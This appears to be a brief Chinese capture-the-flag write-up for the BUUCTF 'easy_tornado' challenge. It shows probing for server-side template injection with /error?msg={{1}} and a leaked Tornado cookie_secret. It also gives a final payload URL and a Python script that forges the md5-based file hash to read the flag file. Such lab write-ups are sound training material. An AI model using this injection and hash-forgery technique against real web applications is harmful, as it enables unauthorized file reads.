CTF-BUUCTF-Web-[护网杯 2018]easy_tornado
看题:
解题:
1、flag --> 在文件 fllllllllllllag中
2、render()函数渲染 --> 用到SSTI
尝试输入/error?msg={{1}}
,确实是存在模板注入
3、cookie_secret
什么是tornado?
cookie_secret在哪?
4、解题
cookie_secret --> ‘43998eab-5931-4776-9249-7827c85788e2’
filename --> /fllllllllllllag
payload --> file?filename=/fllllllllllllag&filehash=0cd840b7bb1ba8f2ec7342eb5fab94b8
md5:
# -*- coding: UTF-8 -*-
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = '43998eab-5931-4776-9249-7827c85788e2'
print(md5(cookie_secret+md5(filename)))
if __name__ == '__main__':
filehash()